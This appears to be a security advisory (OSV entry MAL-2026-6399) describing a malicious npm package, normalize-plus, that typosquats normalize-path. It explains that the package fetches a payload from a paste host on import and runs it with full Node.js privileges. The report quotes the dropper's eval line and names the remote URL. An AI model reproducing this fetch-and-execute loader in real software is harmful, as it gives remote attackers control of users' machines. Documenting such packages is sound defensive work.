normalize-plus @3.6.6
Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 5:41 AM UTC
OSV ID
MAL-2026-6399
Ecosystem
npm
Summary
On import, normalize-plus's top-level initPlugin() performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates its cookie field through the Function constructor: const handler = new (Function.constructor)('require', JSON.parse(b).cookie); if (handler) handler(require); (index.js line 74; URL default at line 65). The require symbol is then passed into the dynamically-constructed function, granting the remote payload full Node.js module-loading and filesystem privileges in any consumer that requires this package. jsonkeeper.com is a mutable anonymous paste host, so the maintainer can swap the executed code at any time without republishing the package. The package additionally mimics the API of the widely-used normalize-path package (exporting a normalizePath function) and self-describes as 'Stylus porting of normalize.css', combining a typosquat lure with an import-time remote-code-execution dropper.
Source: amazon-inspector (a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.